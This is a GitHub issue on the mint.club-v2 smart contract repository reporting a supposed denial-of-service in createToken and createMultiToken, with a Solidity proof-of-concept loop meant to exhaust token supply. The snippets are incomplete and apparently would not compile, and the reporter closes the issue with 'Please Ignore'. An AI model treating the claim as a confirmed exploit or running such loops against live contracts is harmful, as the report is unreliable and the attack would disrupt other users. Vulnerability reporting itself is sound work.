Steemhunt/mint.club-v2-contract

Possibile Dos Preventing CreateToken and createMultiToken

Closed this issue · 1 comments

the-first-elder commented

Users can mint max number of uint128 possible recurrently

mint.club-v2-contract/contracts/MCV2_Bond.sol

Line 246 in 0665adb

function createToken(TokenParams calldata tp, BondParams calldata bp) external payable returns (address) { 

    BondStep[] memory exampleSteps = new BondStep[](1);
        exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });

        uint128[] memory price = new uint128[](2); // Adjust the length as needed
        price[0] =0;
        price[1] = 2;

       uint128[] memory range = new uint128[](2); // Adjust the length as needed
        range [0] =  type(uint128).max;
        range [1] = 2;

        BondParams memory bondParams = BondParams({
            royalty: 1000,
            reserveToken: random, // Replace with the actual address
            maxSupply: maxSupply,
            stepRanges: range, // Step ranges
            stepPrices: price // Should have the same length as stepRanges
        });

by Leveraging on this condition...

mint.club-v2-contract/contracts/MCV2_Bond.sol

Line 261 in 0665adb

if (bp.stepPrices[0] == 0) {

The function above is called multiple times with a malicious contract in a loop Multiple times. With the aim of maxing out Mcv2Token::totalsupply which is a uint256. To prevent other users from been able to mint nor create a token.. in this format

uint256 totalSupply = testToken.totalSupply();
        uint128 newMint = type(uint128).max;
        uint256 maxUint = type(uint256).max;

      for (uint256 i = 0; i < 10; i++) {
            if ((maxUint - totalSupply) < newMint) {
                newMint = newMint / 2;
            }
BondStep[] memory exampleSteps = new BondStep[](1);
        exampleSteps[0] = BondStep({ rangeTo: 0, price: 0 });

        uint128[] memory price = new uint128[](2); // Adjust the length as needed
        price[0] =0;
        price[1] = 2;

       uint128[] memory range = new uint128[](2); // Adjust the length as needed
        range [0] =  newMint;
        range [1] = 2;

        BondParams memory bondParams = BondParams({
            royalty: 1000,
            reserveToken: random, // Replace with the actual address
            maxSupply: maxSupply,
            stepRanges: range, // Step ranges
            stepPrices: price // Should have the same length as stepRanges
        });
   MCV2Bond.createToken();

}

Max Uint available for McV2Token is almost completely exhausted. and would prevent other users from creating a new Token. as there would be arithmethic overflow and underflow...

This is also applicable here

mint.club-v2-contract/contracts/MCV2_Bond.sol

Line 274 in 0665adb

function createMultiToken(MultiTokenParams calldata tp, BondParams calldata bp) external payable returns (address) {

mint.club-v2-contract/contracts/MCV2_Bond.sol

Line 290 in 0665adb

newToken.mintByBond(_msgSender(), bp.stepRanges[0]);

the-first-elder commented

Please Ignore